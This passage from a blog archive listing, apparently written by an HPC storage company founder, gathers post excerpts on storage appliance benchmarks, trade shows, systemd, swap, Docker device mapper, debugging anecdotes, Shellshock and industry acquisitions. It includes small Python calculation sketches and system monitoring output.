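print(f"full box:     {full_box:.0f} s ({full_box / 3600:.1f} hours)")
```

Capacity per drive grows much faster than the bandwidth to reach it, so the time to fill or drain keeps climbing. That is the wall.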
Posts
Raw Unapologetic Firepower: kdb+ from @Kx
While the day job builds (hyperconverged) appliances for big data analytics and storage, our partners build the tools that enable users to work easily with astounding quantities of data, and do so very rapidly, and without a great deal of code. I’ve always been amazed at the raw power in this tool. Think of a concise functional/vector language, coupled tightly to a SQL database. It’s not quite an exact description; have a look at Kx’s website for a more accurate one.
Posts
Systemd and non-desktop scenarios
So we’ve been using Debian 8 as the basis of our SIOS v2 system. Debian has a number of very strong features that make it a fantastic basis for developing a platform … for one, it doesn’t have significant negative baggage/technical debt associated with poor design decisions early on in the development of the system as others do. But it has systemd. I’ve been generally non-committal about systemd, as it seemed like it should improve some things, at a fairly minor cost in additional complexity.
Posts
Talk from #Kxcon2016 on #HPC #Storage for #BigData analytics is up
See here, which was largely about how to architect high performance analytics platforms, and a specific shout out to our Forte NVMe flash unit, which is currently available in volume starting at $1 USD/GB. Some of the more interesting results from our testing:
* 24GB/s bandwidth largely insensitive to block size.
* 5+ Million IOPs random IO (5+MIOPs) sensitive to block size.
* 4k random read (100%) were well north of 5M IOPs.
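IOPs and bandwidth are tied together by the block size, which is why one figure can be sensitive to it while the other is not. A quick sketch of the conversion, using the 4k and 5M figures from the list above (the function name `iops_to_gb_per_s` is made up for illustration, and decimal GB is assumed):

```python
def iops_to_gb_per_s(iops: float, block_bytes: int) -> float:
    """Bandwidth implied by an IOPs rate at a fixed block size (decimal GB/s)."""
    return iops * block_bytes / 1e9


# 5 million 4k (4096 byte) random reads per second.
print(f"{iops_to_gb_per_s(5_000_000, 4096):.2f} GB/s")
```

So 5M IOPs at 4k is already in the same ballpark as the quoted streaming bandwidth, and larger blocks would hit the bandwidth ceiling at far lower IOPs.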
Posts
Not even breaking a sweat: 10GB/s write to single node Forte unit over 100Gb net #realhyperconverged #HPC #storage
TL;DR version: 10GB/s write, 10GB/s read in a single 2U unit over 100Gb network to a backing file system. This is tremendous. The system and clients are using our default tuning/config. Real hyperconvergence requires hardware that can move bits to/from storage/networking very quickly. This is that. These units are available. Now. In volume. And are very reasonably priced (starting at $1USD/GB). Contact us for more details. This is with a file system …
Posts
Massive unapologetic storage firepower part 4: On the test track with a Forte unit ... vaaaaROOOOOOMMMMMMM!!!!!
I am trying to help people conceptualize the experience. Here is a video depicting very fast, very powerful cars and their sound signatures.
This is a good start. Take one of those awesome machines, and turn off half the engine. So it is literally running with 1/2 of its power turned off. Remember this. There will be a quiz. As we flippantly noted in the video, this is face-melting performance. Had I any hair left, it would have been blown way back.
Posts
When infinite resources aren't, and why software assumes they are infinite
We’ve got customers with very large resource machines. And software that sees all those resources and goes “gimme!!!!”. So people run. And then more people use it. And more runs. Until the resources are exhausted. And hilarity (of the bad kind) ensues. These are firedrills. I get an open ticket that “there must be something wrong with the hardware”, when I see all the messages in console logs being pulled in from ICL saying “zOMG I am out of ram ….
Posts
Nutanix files for IPO
Short story here. I am not going to pore over their S-1 form to find interesting tidbits, others will do that, and are paid to do so. They are the first of several, though I had thought that Dell would acquire them before they hit IPO. I am guessing that the combination of the price for them, plus the EMC acquisition stopped this conversation. So now Nutanix is going to IPO.
Posts
#Perl6 compiler betas are ready
Ok … I am … well … blown away. I had thought Perl6 would be the Duke Nukem Forever of programming languages. Indeed, it has been in active development for more than a decade. But you can download compilers (yes, you heard me right, compilers) for it now. You might say “why perl” or “why perl6” or “why now, because we have #insert(language_x) and it’s wonderful”. Good question, I wasn’t sure why it was relevant, until I started reading some of the code.
Posts
Testing a new @scalableinfo Unison #Ceph appliance node for #hpc #storage
Simple test case, no file system … using raw devices, what can I push out to all 60 drives in 128k chunks. Actually this is part of our burn-in test series, I am looking for failures/performance anomalies.
----total-cpu-usage---- -dsk/total- -net/total- ---paging-- ---system--
usr sys idl wai hiq siq| read writ| recv send| in out | int csw
0 1 95 5 0 0| 513M 0 | 480B 0 | 0 0 | 10k 20k
4 2 94 0 0 0| 0 0 | 480B 0 | 0 0 |5238 721
0 2 98 0 0 0| 0 0 | 480B 0 | 0 0 |4913 352
0 2 98 0 0 0| 0 0 | 570B 90B| 0 0 |4966 613
0 2 98 0 0 0| 0 0 | 480B 0 | 0 0 |4912 413
0 2 98 0 0 0| 0 0 | 584B 92B| 0 0 |4965 334
0 2 98 0 0 0| 0 0 | 480B 0 | 0 0 |4914 306
0 2 98 0 0 0| 0 0 | 636B 147B| 0 0 |4969 483
0 2 98 0 0 0| 0 0 | 570B 0 | 0 0 |4915 377
8 8 50 32 0 2|7520k 8382M| 578B 0 | 0 0 | 76k 215k
9 7 30 52 0 3|8332k 12G| 960B 132B| 0 0 | 109k 279k
10 5 29 53 0 2|4136k 12G| 240B 0 | 0 0 | 109k 277k
12 6 29 51 0 2|4208k 12G| 240B 0 | 0 0 | 108k 280k
11 6 31 50 0 2|2244k 12G| 330B 90B| 0 0 | 109k 281k
11 6 30 50 0 3|2272k 13G| 240B 0 | 0 0 | 110k 281k
Writes around 12.
Posts
Video interview: face melting performance in #hpc #nvme #storage @scalableinfo
Oh no … we didn’t say “face melting” … did we? Oh. Yes. We. Did. The interview is here at the always wonderful InsideHPC.com. You can see the video itself here on YouTube, but read Rich’s transcript. I was losing my voice, and he captured all of the interview in text. Take home messages: Insane IO/Networking/processing performance, small footprint, tiny price, available for orders now.
Posts
There are no silver bullets, 2015 edition
In Feb 2013, I opined (with some measure of disgust) that people were looking at various software packages as silver bullets, these magical bits of a stack which could suddenly transform massive steaming piles of bits (big … uh … “data” ?) into golden nuggets of actionable data. Many of the “solutions” marketed these days are exactly like that … “add our magic bean software to your pipeline and you will gain insight faster.
Posts
Shiny #HPC #storage things at #SC15
Assuming everything goes as planned (HA!) we should have a number of very cool things at SC15.
* 100Gb [Unison storage system with BeeGFS](https://scalableinformatics.com/unison)
* 100Gb [Unison Ceph](https://scalableinformatics.com/unison) system
* 100Gb connection to a partner/customer booth
* Forte

100Gb is awesome. The first time I ran an iperf bidirectional test, saw 20GB/s … it blew me away. 40/56GbE is old hat now, and 10GbE is in the rapidly receding past.
Posts
Cat peeking out of bag: Schedule of presentations and talks in our booth for SC15 is up
I mentioned previously that we have some new (shiny) things … and it looks like you’ll be able to hear about them at my talk. See the schedule for timing information. This said, please note that we have a terrific line up of people giving talks:
* Fintan Quill from Kx on kdb+ … which is an awesome market leading Big Data Time Series analytics and database tool that runs absolutely balls-out insanely fast on our architecture
* Christian Mohrbacher from Thinkparq on BeeGFS … the primary parallel file system we are leveraging for Unison parallel file system appliances
* Mark Nelson from Inktank/Red Hat on Ceph … the reliable block and object storage system that we’ve built into our Unison Object/Block Storage appliance
* Doug Eadline from Basement Supercomputing on Hadoop, and likely showing a Limulus deskside Hadoop appliance
* Phil Mucci from Minimal Metrics on optimization problems for systems and code.
Posts
M&A: EMC gobbled by Dell
Need to think how this will play out. The Register’s take is here. It seems that this will solve the “shareholder value” problem indicated by Elliott Management (e.g. they wanted more return on their investment). As part of increasing the return of value to shareholders, EMC had been in a cost cutting mode. Layoffs have been in process, and likely products trimmed or refocused. Once this goes through (assuming regulators won’t protest), Dell will have
Posts
As the benchmark cooks
We are involved in a fairly large benchmark for a potential customer. I won’t go into many specifics, though I should note that lots of our Unison units are involved. Current architecture has 5 storage nodes (6th was temporarily removed to handle a customer issue). Each Unison node has a pair of 56GbE NICs, as well as our appliance OS, and bunches of other goodness (quite a bit of flash). Total capacity for test is of order 200TB of flash.
Posts
Been there, done that, even have a patent on it
I just saw this about doing a divide and conquer approach to massive scale genomics calculation. While not specific to the code in question, it looked familiar. Yeah, I think I’ve seen something like this before … and wrote the code to do it. It was called SGI GenomeCluster. It was original and innovative at the time, hiding the massively parallel nature of the computation behind a comfortable interface that end users already knew.
Posts
On storage unicorns and their likely survival or implosion
The Register has a great article on storage unicorns. Unicorns are not necessarily mythical creatures in this context, but very high valuation companies that appear to defy “standard” valuation norms, and hold onto their private status longer than those in the past. That is, they aren’t in a rush to IPO or get acquired.
The article goes on to analyze the “storage” unicorns, those in the “storage” field. They admix storage, nosql, hyperconverged, and storage as a service.
Posts
Imitation and repetition is a sincere form of flattery
A few years ago, we demonstrated some truly awesome capability in single racks and on single machines. We had one of our units (now at a customer site), specifically the unit that set all those STAC M3 records, showing this:
and a rack of our units (now providing high performance cloud service at a customer site)
for 8k random reads across 0.25 PB of storage on a very fast 40GbE backbone.
Posts
M&A [RUMOR]: Cisco grabs Nutanix
[update] TL;DR this appears to be rumor/speculation. One would think that such an acquisition would be prominent on Nutanix’s web site. It’s April Fools, in May. /sigh
Huge in the hyperconverged space (which, not so curiously, is where the day job is), and it’s setting up the battle lines between the major software/hardware players. Cisco was already number 5 hardware vendor, and was bragging about “beating the white boxes”. The last may be more wishful thinking than reality.
Posts
Booth at BioIT World 15 in Boston
Should be fun, we will have booth (#461) on the side near the thoroughfare for the talks. Our HPC on Wall Street booth looked like this:
[ ](/images/HPConWS-booth-spring2015.jpg)
The display on the monitor is from our FastPath Cadence machine, and is part of the performance dashboard, built upon InfluxDB, Grafana, sios-metrics, and influxdbcli. Here is a blown up view, note the vertical axes for BW (GB/s) and IOPs.
[ ](/images/cadence-dash-spring2015.jpg)
Posts
The world’s fastest hyper-converged appliance is faster and more affordable than ever
This is a very exciting hyper-converged system, representing our next generation of time series, and big data analytical systems. Tremendous internal bandwidths coupled with massive internal parallelism, and minimal latency design on networks. This unit has been designed to focus upon delivering the maximal performance possible in as minimal a footprint … both rack based and cost wise … as possible. You can use these as independent stand alone units, or integrate them into a larger FastPath Unison system. We have our software stack (SIOS) integrated onto each unit, and include our builds of Python + Pandas/SciPy/NumPy, R, and Perl.
Posts
Interesting Q1 so far for day job
Our Q1 is usually quiet, fairly low key. Not this one. Looks like lots of pent up demand. We are deep into record territory, running 200+% of normal, with possibility of more. Another new wrinkle is that our small investment round is mostly complete. This is new territory for us, and you may have noticed I’d backed off posting intensity over the last half year or so while this was going on.
Posts
When the revolution hits in force ...
Our machines will be there, helping power the genomics pipelines to tremendous performance. Performance is an enabling feature. Without it you cannot even begin to hope to perform massive scale analytics. With it, you can dream impossible dreams. This article came out talking about a massive performance analytics pipeline at Nationwide Children’s Hospital in Ohio. This pipeline runs on a cluster attached to Scalable Informatics FastPath Unison storage. This is a very dense, very fast system, interconnected with Mellanox FDR Infiniband, Chelsio 40GbE, and leveraging BeeGFS from thinkparq.
Posts
Inventory reduction @scalableinfo
It’s that time of year, when the inventory fairies come out and begin their counting. Math isn’t hard, but the day job would like a faster and easier count this year. So, the day job is working on selling off existing inventory. We have 4 units ready to go out the door to anyone in need of 70-144TB usable storage at 5-6 GB/s per unit. Specs are as follows:
* 16-24 processor cores
* 128 GB RAM
* 48x {2,3,4} TB top mount drives
* 4x rear mount SSDs (OS/metadata cache)
* Scalable OS (Debian Wheezy based Linux OS)
* 3 year warranty

As this is inventory reduction, the more inventory you take, the happier we are (and the less work that the inventory fairies have to do).
Posts
Starting to come around to the idea that swap in any form, is evil
Here’s the basic theory behind swap space. Memory is expensive, disk is cheap. Only use the faster memory for active things, and aggressively swap out the less used things. This provides a virtual address space larger than physical/logical memory. Great, right? No. Here’s why.
Swap makes the assumption that you can always write/read to persistent memory (disk/swap). It never assumes persistent memory could have a failure. Hence, if some amount of paged data on disk suddenly disappeared, well … Put another way, it increases your failure likelihood, by involving components with higher probability of failure into a pathway which assumes no failure.
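To put rough numbers on the failure likelihood argument: if a pathway depends on several components and any one failing breaks it, the chance of a break is one minus the product of the individual survival probabilities. The sketch below assumes the failures are independent, and the probabilities are invented purely for illustration. They are not measurements of any real hardware.

```python
from math import prod


def any_failure_probability(component_probs):
    """Probability that at least one component fails, assuming independence."""
    return 1.0 - prod(1.0 - p for p in component_probs)


# Hypothetical per-period failure probabilities (made up for illustration).
P_RAM = 0.001    # memory subsystem
P_DISK = 0.02    # the swap device

ram_only = any_failure_probability([P_RAM])
ram_plus_swap = any_failure_probability([P_RAM, P_DISK])

print(f"RAM only:        {ram_only:.5f}")
print(f"RAM + swap disk: {ram_plus_swap:.5f}")
```

With numbers like these, the swap device dominates the result, which is the point: the pathway is only as reliable as the least reliable thing you put in it.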
Posts
30TB flash disk, Parallel File System, massive network connectivity
This will be fun to watch run …
Scalable Informatics FastPath Unison for the win!
Posts
SC14 T minus 6 and counting
Scalable’s booth is #3053. We’ll have some good stuff, demos, talks, and people there. And coffee. Gotta have the coffee. More soon, come by and visit us!
Posts
massive unapologetic firepower part 2 ... the dashboard ...
For Scalable Informatics Unison product. The whole system:
[ ](/images/dash-2.png)
Watching writes go by:
[ ](/images/dash-3.png)
Note the sustained 40+ GB/s. This is a single rack sinking this data, and no SSDs in the bulk data storage path. This dashboard is part of the day job’s FastPath product.
Posts
Updated boot tech in Scalable OS (SIOS)
This has been an itch we’ve been working on scratching a few different ways, and it’s very much related to forgoing distro based installers. Ok, first the back story. One of the things that has always annoyed me about installing systems has been the fundamental fragility of the OS drive. It doesn’t matter if it’s RAIDed in hardware/software. It’s a pathway that can fail. And when it fails, all hell breaks loose.
Posts
Soon ... 12g goodness in new chassis
This is one of our engineering prototypes that we had to clear space for. A couple of new features I’ll talk about soon, but you should know that these are 12g SAS machines (will do 6g SATA of course as well).
Front of unit:
[ ](/images/IMG_2330.JPG)
Note the new logo/hand bar. The rails are also brand new, and are set to enable easy slide in/out even with 100+ lbs of disk in them.
Posts
Massive, unapologetic, firepower: 2TB write in 73 seconds
A 1.2PB single mount point Scalable Informatics Unison system, running an MPI job (io-bm) that just dumps data as fast as the little Infiniband FDR network will allow. Our test case. Write 2TB (2x overall system memory) to disk, across 48 procs. No SSDs in the primary storage. This is just spinning rust, in a single rack. This is performance pr0n, though safe for work.
usn-01:/mnt/fhgfs/test # df -H /mnt/fhgfs/
Filesystem Size Used Avail Use% Mounted on
fhgfs_nodev 1.
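For scale, the headline figures (2TB written in 73 seconds, across 48 procs) work out as follows. This is just a sketch assuming decimal units (1 TB = 1000 GB), and the function name `throughput_gb_per_s` is made up for illustration.

```python
def throughput_gb_per_s(total_tb: float, seconds: float) -> float:
    """Sustained throughput in GB/s for a transfer of total_tb terabytes."""
    return total_tb * 1000.0 / seconds  # TB -> GB, decimal units assumed


aggregate = throughput_gb_per_s(2, 73)   # roughly 27.4 GB/s for the whole rack
per_proc = aggregate / 48                # roughly 0.57 GB/s per MPI process

print(f"aggregate: {aggregate:.1f} GB/s, per process: {per_proc:.2f} GB/s")
```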
Posts
Doing what we are passionate about
I am lucky. I fully admit this. There are people out there who will tell you that it’s pure skill that they have been in business and been successful for a long time. Others will admit luck is part of it, but will again, pat themselves on the back for their intestinal fortitude. Few will say “I am lucky”. Which is a shame, as luck, timing (which you can never really, truly, control), and any number of other factors really are critical to one being able to have the luxury of doing what we are doing.
Posts
We had a record setting, knock the barn doors down year last year
… and believe it or not, I forgot to mention it. This is the first time in company history that we had a backlog going into Q1. Orders being built and tested on the last work day of the year. We grew, not the amount we had originally forecast, but we understand why (and sadly have little control over that aspect). We are working very hard on our appliances … I am blown away as to how perfect a fit they are for folks.
Posts
Day job at HPC on Wall Street on Monday the 9th
We’ll be showing off 2 appliances, with a change of what we are showing/announcing on one due to something not being ready on the business side. The first one is our little 108 port siRouter box. Think ‘bloody fast NAT’ and SDN in general, you can run other virtual/bare metal apps atop it.
The second will be a massive scale parallel SQL DB appliance. Usable for big data, hadoop like workloads, and other similar workloads more commonly used on other well known platforms.
Category: bugs
Posts
What reduces risk ... a great engineering and support team, or a brand name ?
I’ve written about approved vendors and “one throat to choke” concept in the past. The short take from my vantage point as a small, not well known, but highly differentiated builder of high performance storage and computing systems … was that this brand specific focus was going to remove real differentiated solutions from market, while simultaneously lowering the quality and support of products in market. The concept of brand and marketing of a brand is about erecting barriers to market entry against the smaller folk who might have something of interest, and the larger folk who might come in with a different ecosystem.
Posts
On hackerrank and Julia
My new day job has me developing considerably less code than my previous endeavor, so I like to work on problems to keep these particular muscles in steady use. Happily, I get to do more analytics than ever before, so this at least is some compensation for the lower amount of coding. When I work on coding for myself, I’ll play with problems from my research days, or small throw-away ones, like on Hackerrank.
Posts
That was fun: mysql update nuked remote access
Update your packages, they said. It will be more secure, they said. I guess it was. No network access to the databases. Even after turning the database server instance to listen again on the right port, I had to go in and redo the passwords and privileges. So yeah, this broke my MySQL instance for a few hours. Took longer to debug as it was late at night and I was sleepy, so I put it off until morning with caffeine.
Posts
when you eliminate the impossible, what is left, no matter how improbable, is likely the answer
This is a fun one. A customer has quite a collection of all-flash Unison units. A while ago, they asked us to turn on LLDP support for the units. It has some value for a number of scenarios. Later, they asked us to turn it off. So we removed the daemon. Unison ceased generating/consuming LLDP packets. Or so we thought. Fast forward to last week. We are being told that LLDP PDUs are being generated by the kit.
Posts
Another fun bit of debugging
Ok … so here you are doing a code build. Your environment is all set. You have ample space. Lots of CPU, lots of RAM. All packages are up to date. You start your make. You have another window open with dstat running, just to kinda, sorta watch the system, while you are doing other things. And while you are working, you realize dstat has stopped scrolling. Strange, why would that be.
Posts
strace -p is your friend
So there I was, trying to use a serial port on a node which was connected to a serial port on a switch. Which I needed to properly configure the switch. So I light up minicom and get garbage. Great, a baud rate mismatch, easily fixed. Fix it. Connect again. I get the first 10-12 characters … and then garbage. Hmmm. I’d like to pause our story for a moment, and say I had the key insight at this moment … but that would not be true.
Posts
Finding unpatched "features" in distro packages
I generally expect baseline distro packages to be “old” by some measure. Even for more forward thinking distros, they generally (mis)equate age with stability. I’ve heard the expression “bug for bug compatible” when dealing with newer code on older systems. Something about the devil you know vs the devil you don’t. Ok. In this case, CMake. A good development tool, gaining popularity over autotools and other things. Base SIOS image is on Debian 8.
Posts
Excellent article on mistakes made for infrastructure ... cloud jail is about right
Article is here at First Round Capital. This goes to a point I’ve made many many times to customers going the cloud route exclusively rather than the internal infrastructure route or hybrid route. Basically it is that the economics simply don’t work. We’ve used a set of models based upon observed customer use cases, and demonstrated this to many folks (customers, VCs, etc.) Many are unimpressed until they actually live the life themselves, have the bills to pay, and then really … really grok what is going on.
Posts
I don't agree with everything he wrote about systemd, but he isn't wrong on a fair amount of it
Systemd has taken the linux world by storm. It replaces 20-ish year old init style processing with a more legitimate control plane, a centralized resource to handle this control. There are many things to like within it, such as the granularity of control. But there are any number of things that are badly broken by default. Actually some of these things are specifically geared towards desktop users (which isn’t a bad thing if you are a desktop linux user, as I am).
Posts
Systemd and non-desktop scenarios
So we’ve been using Debian 8 as the basis of our SIOS v2 system. Debian has a number of very strong features that make it a fantastic basis for developing a platform … for one, it doesn’t have significant negative baggage/technical debt associated with poor design decisions early on in the development of the system as others do. But it has systemd. I’ve been generally non-committal about systemd, as it seemed like it should improve some things, at a fairly minor cost in additional complexity.
Posts
You can't win
Like that old joke about the patient going to the Doctor for a pain …
Imagine if you will, a patient who, after being told what is wrong, and why it hurts, and what to do about it, continues to do it. And be more intensive about doing it. And then complains when it hurts. This is a rough metaphor for some recent support experiences. We do our best to convince them not to do the things that cause them pain, as in this case, they are self-inflicted.
Posts
That was fun ... no wait ... the other thing ... not fun
Long overdue update of the server this blog runs on. It is no longer running an Ubuntu flavor, but instead running SIOSv2 which is the same appliance operating system that powers our products. This isn’t specifically a case of eating our own dog-food, but more a case that Ubuntu, even the LTS versions, has a specific sell by date, and it is often very hard to update to the newer revs.
Posts
Best practice or random rule ... diagnosing problems and running into annoyances
As often as not, I’ll hear someone talk about a “best practice” that they are implementing or have implemented. Things that run counter to these “best practices” are obviously, by definition, “not best”. What I find sometimes amusing, often alarming, is that the “best practices” are often disconnected from reality in specific ways. This is not a bash on all best practices, some of them are sane, and real. Like not allowing plain text passwords for logins.
Posts
It is 2016 ... why am I fighting with LDAP authentication in linux? Why doesn't it just work?
Ok … very long story that boils down to us trying to help a customer out. I am trying to avoid the “let’s just add another user to /etc/passwd” or similar such thing. And they aren’t quite ready to hook into AD or similar. So we have this issue. I want to enable their nodes to use ldap. I’ve done this before for other customers with older tools (pam_ldap, etc.). But it was somewhat crazy (as in non-trivial), involving gnashing of teeth, gums, etc.
Posts
The joys of automated tooling ... or ... catching changes in upstream projects workflows by errors in yours
We have an automated build process for our boot images. It is actually quite good, allowing us to easily integrate many different capabilities with it. These capabilities are usually encapsulated in various software stacks that provide specific functionality. Most of these stacks follow pretty well defined workflows. For a number of reasons, we find building from source generally easier than package installation, as there are often some, well, effectively random (and often poor) choices in build options/file placement in the package builds.
Posts
Not a fan of device mapper in Linux
Yeah, I know. It brings all manner of capabilities with it. It’s just that the cost of these capabilities, when combined with other tools, like, say, Docker, makes me not want to use it. To wit:
root@ucp-01:~# ls -alF /var/lib/docker/devicemapper/devicemapper/
total 52508
drwx------ 2 root root 80 Jan 29 22:38 ./
drwx------ 4 root root 80 Jan 29 22:38 ../
-rw------- 1 root root 107374182400 Jan 29 22:39 data
-rw------- 1 root root 2147483648 Jan 29 22:39 metadata
root@ucp-01:~# ls -halF /var/lib/docker/devicemapper/devicemapper/
total 52M
drwx------ 2 root root 80 Jan 29 22:38 .
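Note the mismatch in that listing: `data` reports 107374182400 bytes (100 GiB) while the directory total is about 52M, which is what sparse files look like. A small Python sketch of how to see the same thing for any file, comparing apparent size against allocated blocks. This assumes a POSIX system where `st_blocks` counts 512 byte units (true on Linux, not guaranteed everywhere), and the file here is a throwaway created in a temp directory, not the Docker one.

```python
import os
import tempfile


def sizes(path):
    """Return (apparent_bytes, allocated_bytes) for a file."""
    st = os.stat(path)
    # Assumption: st_blocks is in 512 byte units, as on Linux.
    return st.st_size, st.st_blocks * 512


def make_sparse(path, size_bytes):
    """Create a file of the given apparent size without writing any data."""
    with open(path, "wb") as fh:
        fh.truncate(size_bytes)


with tempfile.TemporaryDirectory() as tmp:
    path = os.path.join(tmp, "data")
    make_sparse(path, 64 * 1024 * 1024)   # 64 MiB apparent size
    apparent, allocated = sizes(path)
    print(f"apparent:  {apparent} bytes")
    print(f"allocated: {allocated} bytes")
```

On a filesystem that supports sparse files the allocated figure stays tiny until something actually writes into the file, at which point it starts eating real space.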
Posts
When infinite resources aren't, and why software assumes they are infinite
We’ve got customers with very large resource machines. And software that sees all those resources and goes “gimme!!!!”. So people run. And then more people use it. And more runs. Until the resources are exhausted. And hilarity (of the bad kind) ensues. These are firedrills. I get an open ticket that “there must be something wrong with the hardware”, when I see all the messages in console logs being pulled in from ICL saying “zOMG I am out of ram ….
Posts
A wonderful read on metrics, profiling, benchmarking
Brendan Gregg’s writings are always interesting and informative. I just saw a link on Hacker News to a presentation he gave on “Broken Performance Tools”. It is wonderful, and succinctly explains many things I’ve talked about here and elsewhere, but it goes far beyond what I’ve grumbled over. One of my favorite points in there is slide 83. “Most popular benchmarks are flawed” and a pointer to a paper (easy to google for).
Posts
diagnostics
This is something of a hard post to write, for a number of reasons, not the least of which is that the topic comes as something of a surprise to me. I am just going to state it, and then discuss it. The vast majority of people (and companies) out there, who think they know something of hardware/software/system level diagnostics and problem identification (from newbie to “veteran”) are either full of it, or really clueless.
Posts
love/hate relationship with new hardware
One of the dangers of dealing with newer hardware is often that it doesn’t work so well. Or the drivers get hosed in mysterious ways. We’ve got some nice shiny new 10GbE cards for a set of Unison systems going into a customer next week. We had some very odd issues with other 10GbE cards, so we rolled over to newer design cards. Younger silicon, younger design. Newer kernel module. I can’t say I am enjoying this experience thus far.
Posts
Real measurement is hard
I had hinted at this last week, so I figure I better finish working on this and get it posted already. The previous bit with language choice wakeup was about the cost of Foreign Function Interfaces, and how well they were implemented. For many years I had honestly not looked as closely at Python as I should have. I’ve done some work in it, but Perl has been my go-to language.
Posts
Anatomy of a #fail ... the internet of broken software stacks
So I’ve been trying to diagnose a problem with my Android devices running out their batteries very quickly. And at the same time, I’ve been trying to understand why my address bar on Thunderbird has taken a very long time to respond. I had made a connection earlier today when I had noticed the 50k+ contacts in my contact list, of which maybe 2000 were unique. I didn’t quite understand it.
Posts
Drivers developed largely out of kernel, and infrequently synced
One of the other aspects of what we’ve been doing has been forward porting drivers into newer kernels, fixing the occasional bug, and often rewriting portions to correct interface changes. I’ve found that subsystem vendors seem to prefer to drop code into the kernel very infrequently. Sometimes they are synced only once every few years. Which leads to distro kernels having often terribly broken device support. And often very unstable device support.
Posts
Amusing #fail
I use Mozilla’s Thunderbird mail client. For all its faults, it is still the best cross platform email system around. Apple’s mail client is a bad joke and only runs on Apple devices (go figure). Linux’s many offerings are open source, portable, and most don’t run well on my Mac laptop. I no longer use Windows apart from running in a VirtualBox environment. And I would never go back to Outlook anyway (used it once, 15 years ago or so … never again).
Posts
Systemd, and the future of Linux init processing
An interesting thing happened over the last few months and years. Systemd, a replacement init process for Linux, gained more adherents, and supplanted the older style init.d/rc scripting in use by many distributions. Ubuntu famously abandoned init.d style processing in favor of upstart and others in the past, and has been rolling over to systemd. Red Hat rolled over to Systemd. As have a number of others. Including, surprisingly, Debian. For those who don’t know what this is, think of it this way.
Posts
And the 0.8.3 InfluxDB no longer works with the InfluxDB perl module
I ran into this a few weeks ago, and am just getting around to debugging it now. Traced the code, set up a debugger and followed the path of execution, and … and … Yup, it’s borked. So, I can submit a patch or 3 against the InfluxDB code, or roll a simpler more general Time Series Data Base interface that will talk to InfluxDB. And eventually kdb+. Since I wanted to code for that as well, I am looking more seriously at the second option.
Posts
Shellshock is worse than heartbleed
In part because, well, the patches don’t seem to cover all the exploits. For the gory details, look at the CVE list here. Then cut and paste the local exploits. Even with the latest patched source, built from scratch, there are active working compromises. With heartbleed, all we had to do was nuke keys, patch/update packages, restart machines, cross fingers. This is worse, in that the fixes … well … don’t.
Category: business
Posts
Opening keynote @Supercomputing #SC18 : #HPC is an enabling technology ...
… Ok, the speaker said far more than that. But one of his central theses is that in this “second” machine revolution, we are enabling data driven decision making, distributed decision and consensus, as well as expanding beyond the confines of specific expertise in a field. The latter I’ve heard described as cross fertilization … gather a bunch of smart people “together” and give them a problem spec. Let them run with it.
Posts
#HPC in all the things
I read this announcement this morning. Our friends at Facebook are releasing their reduced precision server side convolution and GEMM operations.
Many years ago, I tried to convince people that HPC moves both down market, into lower cost hardware, as well as more widely into more software toolchains. Basically, the decades of experience building very high performance applications and systems will have value downstream for many users over time.
GEMM is a generalized approach to a matrix multiply, which has been well optimized for HPC applications in various scientific libraries over time.
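For readers who have not met GEMM before, here is a minimal sketch of the operation as the BLAS interface defines it, C ← αAB + βC, in plain Python. It is only a reference for the arithmetic, not the reduced precision kernels from the announcement. The function name `gemm` and the list-of-lists layout are choices made for this illustration.

```python
def gemm(alpha, a, b, beta, c):
    """Return alpha * (a @ b) + beta * c for row-major lists of lists.

    a is m x k, b is k x n, c is m x n. The input c is not modified.
    """
    m, k = len(a), len(a[0])
    n = len(b[0])
    if len(b) != k or len(c) != m or any(len(row) != n for row in c):
        raise ValueError("shape mismatch between a, b and c")

    # Start from the scaled copy of c, then accumulate alpha * a * b into it.
    out = [[beta * c[i][j] for j in range(n)] for i in range(m)]
    for i in range(m):
        for p in range(k):
            aip = alpha * a[i][p]
            for j in range(n):
                out[i][j] += aip * b[p][j]
    return out


if __name__ == "__main__":
    a = [[1.0, 2.0], [3.0, 4.0]]
    b = [[5.0, 6.0], [7.0, 8.0]]
    c = [[1.0, 0.0], [0.0, 1.0]]
    print(gemm(2.0, a, b, 1.0, c))
```

The loop order (i, p, j) walks rows of `b` contiguously, which hints at why tuned libraries spend so much effort on memory access patterns: the arithmetic is trivial, and the data movement is where the optimization work goes.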
Posts
Looking forward to #SC18 next week and a discussion of all things #HPC
I’m attending SC18 next week. It’s been 3 years since I last attended (2015). Then we (@scalableinfo) had a large booth, lots of traffic, and showed off some of the first commercial NVMe high performance storage systems running BeeGFS over 100GbE.
I am looking forward to talking with as many people as I can, to get their perspectives on things. To see what they are thinking, hear what they are doing, and in which direction they are going.
Posts
So I've got ideas for two businesses
Neither one is computer related. Both are based upon what I see as unmet needs for various groups. One is definitely a “gotta have” for one group. The other group, there is one “solution” on the market that I looked at, and it’s pretty pathetic. The other uses technology where it should be using chemistry, as the tech is simply way too expensive for mass use, and quite inflexible. Both are B2C.
Posts
Typecasting and the "trust us" factor
Finding myself on the other side of the table in the consumer-vendor relationship has resulted in some eye opening experiences. These are things I look back on, and realize that I strenuously avoided doing during my Scalable days. But I see everyone doing it now, as they try to sell me stuff, or convince me to use things. One of the eye opening things is a bit of typecasting of sorts.
Posts
On technology zealotry
I’ve encountered this in my career, at many places. Sadly, early in my career, I participated in some of this. You are a zealot for a particular form of tech if you can see it do no wrong, and decry reports of issues or problems as “attacks”. You are a zealot against a particular form of tech if you cannot see it as a potentially useful and valuable portion of a solution stack, and (often gleefully) amplify reports of issues or problems.
Posts
M&A and business things
First up, Tegile was acquired by Western Digital (WDC). This is in part due to WDC’s desire to be a one stop shop vertically integrated supplier for storage parts, systems, etc. This is how all of the storage parts OEMs needed to move, though Seagate failed to execute this correctly, selling off their array business in part to Cray. Toshiba … well … they have some existential challenges right now, and are about to sell off their profitable flash and memory systems business, if they can just get everyone to agree … This comes from the fact that spinning disk, while a venerable technology, has been effectively completely commoditized.
Posts
Cray "acquires" ClusterStor business unit from Seagate
Information at this link. It is being called a “strategic transaction”, though it likely came about vis-a-vis Seagate doing some profound and deep thinking over what business it was in. Seagate has been weathering a storm, and has been working on re-orgs to deal with a declining disk market. They acquired ClusterStor as part of a preceding transaction of Xyratex. Xyratex was the basis for the Cray storage platforms (post Engenio).
Posts
What reduces risk ... a great engineering and support team, or a brand name ?
